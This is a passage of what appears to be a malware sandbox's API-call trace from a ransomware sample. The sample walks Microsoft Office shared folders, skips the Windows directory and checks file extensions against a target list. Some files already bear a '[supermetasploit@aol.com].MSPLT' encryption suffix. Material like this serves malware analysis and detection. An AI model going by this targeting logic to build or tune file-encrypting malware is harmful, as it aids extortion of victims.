lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80acba0b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80acba0b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbbdc5100, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x22e0a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppvIsvSubsystems64.dll", cAlternateFileName="AP4400~1.DLL")) returned 1 [0286.190] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80af1c6a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80af1c6a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x8a8d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVIsvVirtualization.dll", cAlternateFileName="AP485B~1.DLL")) returned 1 [0286.190] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80af1c6a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80af1c6a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x12cad8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVManifest.dll", cAlternateFileName="APPVMA~1.DLL")) returned 1 [0286.190] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b17ebf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b17ebf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0xe76d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVOrchestration.dll", cAlternateFileName="APPVOR~1.DLL")) returned 1 [0286.190] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b17ebf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b17ebf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x13c4d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVPolicy.dll", cAlternateFileName="APPVPO~1.DLL")) returned 1 [0286.190] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b17ebf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b17ebf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9e226c00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x7d0d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVScripting.dll", cAlternateFileName="APPVSC~1.DLL")) returned 1 [0286.190] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9e226c00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x406d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVShNotify.exe", cAlternateFileName="APPVSH~1.EXE")) returned 1 [0286.191] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x14115400, ftLastWriteTime.dwHighDateTime=0x1d0d7a5, nFileSizeHigh=0x0, nFileSizeLow=0xc84c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="C2R32.dll", cAlternateFileName="")) returned 1 [0286.191] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb4b54300, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x127260, dwReserved0=0x0, dwReserved1=0x0, cFileName="C2R64.dll", cAlternateFileName="")) returned 1 [0286.191] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c8448cb, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c8448cb, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5cdee186, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1130, dwReserved0=0x0, dwReserved1=0x0, cFileName="C2RHeartbeatConfig.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="C2RHEA~1.MSP")) returned 1 [0286.191] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb3841600, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0xdc4b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="C2RUI.en-us.dll", cAlternateFileName="C2RUIE~1.DLL")) returned 1 [0286.191] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x514a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="concrt140.dll", cAlternateFileName="CONCRT~1.DLL")) returned 1 [0286.191] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbd783a00, ftLastWriteTime.dwHighDateTime=0x1d0d7e5, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x0, dwReserved1=0x0, cFileName="i640.hash", cAlternateFileName="I640~1.HAS")) returned 1 [0286.191] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbc470d00, ftLastWriteTime.dwHighDateTime=0x1d0d7e5, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x0, dwReserved1=0x0, cFileName="i641033.hash", cAlternateFileName="I64103~1.HAS")) returned 1 [0286.192] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbe3eab00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x10ae80, dwReserved0=0x0, dwReserved1=0x0, cFileName="IntegratedOffice.exe", cAlternateFileName="INTEGR~1.EXE")) returned 1 [0286.192] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b8a5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b8a5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xa2e72000, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x578d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MavInject32.exe", cAlternateFileName="MAVINJ~1.EXE")) returned 1 [0286.192] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b8a5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b8a5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8745c00, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0x2ffa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="mso20win32client.dll", cAlternateFileName="MSO20W~1.DLL")) returned 1 [0286.192] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80bb0837, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80bb0837, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xad6b600, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0x475e60, dwReserved0=0x0, dwReserved1=0x0, cFileName="mso30win32client.dll", cAlternateFileName="MSO30W~1.DLL")) returned 1 [0286.192] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80bfccf1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80bfccf1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb7179d00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x307ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mso40uires.dll", cAlternateFileName="MSO40U~1.DLL")) returned 1 [0286.192] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c22f4a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80c22f4a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x10cc9700, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0x8e6060, dwReserved0=0x0, dwReserved1=0x0, cFileName="mso40uiwin32client.dll", cAlternateFileName="MSO40U~2.DLL")) returned 1 [0286.193] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x11fdc400, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0xee60, dwReserved0=0x0, dwReserved1=0x0, cFileName="msointl30.en-us.dll", cAlternateFileName="MSOINT~1.DLL")) returned 1 [0286.193] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c9565a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80c9565a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1909ea00, ftLastWriteTime.dwHighDateTime=0x1d098bf, nFileSizeHigh=0x0, nFileSizeLow=0xa12a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0286.193] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80cbb8b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80cbb8b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x9b0a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="msvcp140.dll", cAlternateFileName="")) returned 1 [0286.193] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80cbb8b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80cbb8b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b6c4400, ftLastWriteTime.dwHighDateTime=0x1d098bf, nFileSizeHigh=0x0, nFileSizeLow=0xeb2a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0286.193] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80cbb8b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80cbb8b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb7179d00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x5b1068, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeC2RClient.exe", cAlternateFileName="OFFICE~1.EXE")) returned 1 [0286.193] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d07d85, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d07d85, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb7179d00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0xf34d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeC2RCom.dll", cAlternateFileName="OFFICE~1.DLL")) returned 1 [0286.193] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d07d85, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d07d85, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbd0d7e00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x2a5e58, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeClickToRun.exe", cAlternateFileName="OFFICE~2.EXE")) returned 1 [0286.194] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c8448cb, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c8448cb, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c8448cb, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfficeUpdateSchedule.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="OFFICE~1.MSP")) returned 1 [0286.194] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c86abb7, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5c86abb7, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5c86abb7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1278, dwReserved0=0x0, dwReserved1=0x0, cFileName="ServiceWatcherSchedule.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SERVIC~1.MSP")) returned 1 [0286.194] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbe3eab00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x101458, dwReserved0=0x0, dwReserved1=0x0, cFileName="StreamServer.dll", cAlternateFileName="STREAM~1.DLL")) returned 1 [0286.194] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0xefec0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ucrtbase.dll", cAlternateFileName="")) returned 1 [0286.194] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d7a486, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d7a486, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x5f4b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vccorlib140.dll", cAlternateFileName="VCCORL~1.DLL")) returned 1 [0286.194] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d7a486, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d7a486, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x15ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcruntime140.dll", cAlternateFileName="VCRUNT~1.DLL")) returned 1 [0286.194] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d7a486, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d7a486, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x15ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcruntime140.dll", cAlternateFileName="VCRUNT~1.DLL")) returned 0 [0286.195] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0286.195] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0286.195] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb3e1c92c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb3e1c92c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ink", cAlternateFileName="")) returned 1 [0286.195] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4036fe8 [0286.195] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\*", lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb3e1c92c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb3e1c92c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948228 [0286.197] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb3e1c92c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb3e1c92c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.198] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe462e472, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe462e472, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xc137d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Alphabet.xml", cAlternateFileName="")) returned 1 [0286.198] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05532b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar-SA", cAlternateFileName="")) returned 1 [0286.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA") returned 56 [0286.198] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA") returned 1 [0286.198] lstrlenW (lpString="ar-SA") returned 5 [0286.198] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="ar-SA") returned 1 [0286.198] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4047ec8 [0286.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA") returned 56 [0286.199] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05532b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x3947fe8 [0286.200] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05532b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0286.200] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0286.200] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0286.200] lstrlenW (lpString=".1cd") returned 4 [0286.200] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.200] lstrlenW (lpString=".3ds") returned 4 [0286.200] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0286.200] lstrlenW (lpString=".3fr") returned 4 [0286.200] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0286.200] lstrlenW (lpString=".3g2") returned 4 [0286.200] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0286.200] lstrlenW (lpString=".3gp") returned 4 [0286.200] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0286.201] lstrlenW (lpString=".7z") returned 3 [0286.201] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.201] lstrlenW (lpString=".accda") returned 6 [0286.201] lstrcmpiW (lpString1=".accda", lpString2="ll.mui") returned -1 [0286.201] lstrlenW (lpString=".accdb") returned 6 [0286.201] lstrcmpiW (lpString1=".accdb", lpString2="ll.mui") returned -1 [0286.201] lstrlenW (lpString=".accdc") 